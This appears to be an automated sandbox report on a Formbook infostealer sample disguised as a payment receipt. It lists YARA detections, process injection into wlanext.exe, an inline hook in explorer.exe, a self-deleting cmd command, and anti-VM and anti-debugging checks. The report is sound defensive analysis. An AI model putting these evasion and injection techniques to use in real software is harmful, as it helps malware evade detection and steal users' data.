          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02EC9D70 NtCreateFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02EC9E1F NtReadFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02EC9F4C NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02EC9DC2 NtCreateFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0371B150 appears 145 times
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: String function: 013BB150 appears 145 times
          Source: Final-Payment-Receipt.exe, 00000000.00000000.224938714.000000000009A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000000.00000002.236173671.0000000005570000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameKedermister.dllT vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000002.263682500.000000000163F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000000.230648547.000000000095A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000002.263300020.0000000001382000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamewlanext.exej% vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe | Binary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Final-Payment-Receipt.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@5/3
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Final-Payment-Receipt.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_01
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Final-Payment-Receipt.exe | ReversingLabs: Detection: 34%
          Source: unknown | Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
          Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Final-Payment-Receipt.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Final-Payment-Receipt.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Final-Payment-Receipt.exe, 00000001.00000002.263431017.00000000014AF000.00000040.00000001.sdmp, wlanext.exe, 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Final-Payment-Receipt.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 0_2_055E556E push eax; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 1_2_0041B11C push es; iretd
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 1_2_0040E3C1 pushad ; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 1_2_0040E417 pushad ; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 1_2_00417619 pushfd ; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 1_2_0041CEC5 push eax; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 1_2_0041CF7C push eax; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 1_2_0041CF12 push eax; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 1_2_0041CF1B push eax; ret
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 1_2_0140D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_0376D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02ECDA3E push 00000072h; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02EBE3C1 pushad ; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02ECB11C push es; iretd
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02ECCEC5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02EC7619 pushfd ; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02ECCF7C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02ECCF1B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02ECCF12 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 3_2_02EBE417 pushad ; ret
          Source: initial sample | Static PE information: section name: .text entropy: 7.8171947974

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM_3
          Source: Yara match | File source: 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Final-Payment-Receipt.exe PID: 1692, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 0000000002EB98E4 second address: 0000000002EB98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 0000000002EB9B5E second address: 0000000002EB9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 5772 | Thread sleep time: -52501s >= -30000s
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 6088 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4568 | Thread sleep count: 39 > 30
          Source: C:\Windows\explorer.exe TID: 4568 | Thread sleep time: -78000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5456 | Thread sleep time: -75000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: explorer.exe, 00000002.00000000.246034971.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.236884381.0000000003710000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
          Source: explorer.exe, 00000002.00000002.494413702.0000000003767000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.241386939.00000000053A0000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F4
          Source: explorer.exe, 00000002.00000002.490839971.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000002.499236558.00000000053A0000.00000004.00000001.sdmp | Binary or memory string: AF_UNIXa0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.499263196.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01481074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01484015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01484015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF0BF mov ecx, dword ptr fs:[00000030h]
